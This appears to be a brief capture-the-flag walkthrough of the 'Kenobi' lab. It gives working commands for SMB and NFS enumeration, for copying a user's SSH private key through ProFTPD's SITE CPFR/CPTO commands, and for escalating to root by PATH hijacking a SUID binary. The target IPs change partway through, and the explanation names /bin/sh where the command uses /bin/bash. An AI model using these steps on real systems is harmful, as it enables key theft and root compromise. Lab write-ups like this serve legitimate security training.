Kenobi
January 11, 2024
smbclient -L 10.10.103.177

smbclient \\\\10.10.103.177\\anonymous

View log.txt; it contains information about an id_rsa key.

sudo nmap -sSUC -p 111 10.10.103.177

showmount -e 10.10.103.177

nc 10.10.103.177 21

Use Exploit-DB to search for exploits for the ProFTPD version listening on port 21.

The following commands copy the file id_rsa to /var/tmp:
nc 10.10.103.177 21
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa

Then we mount that directory on our own machine.
First make a directory in /tmp:
sudo mkdir /tmp/attacker
sudo mount -o rw 10.10.82.198:/var/tmp /tmp/attacker

Change the key's permissions to 600, since ssh refuses a private key that is readable by others.

Then just ssh in as the kenobi user:
ssh -i id_rsa kenobi@10.10.82.198

cd /tmp
echo /bin/bash > curl
chmod 777 curl
export PATH=/tmp:$PATH
menu

We copied the /bin/sh shell, called it curl, gave it the correct permissions and then put its location in our path.
This meant that when the /usr/bin/menu binary was run, it's using our path variable to find the "curl" binary,
which is actually a version of /usr/sh; as well as this, the file is run as root, so it runs our shell as root!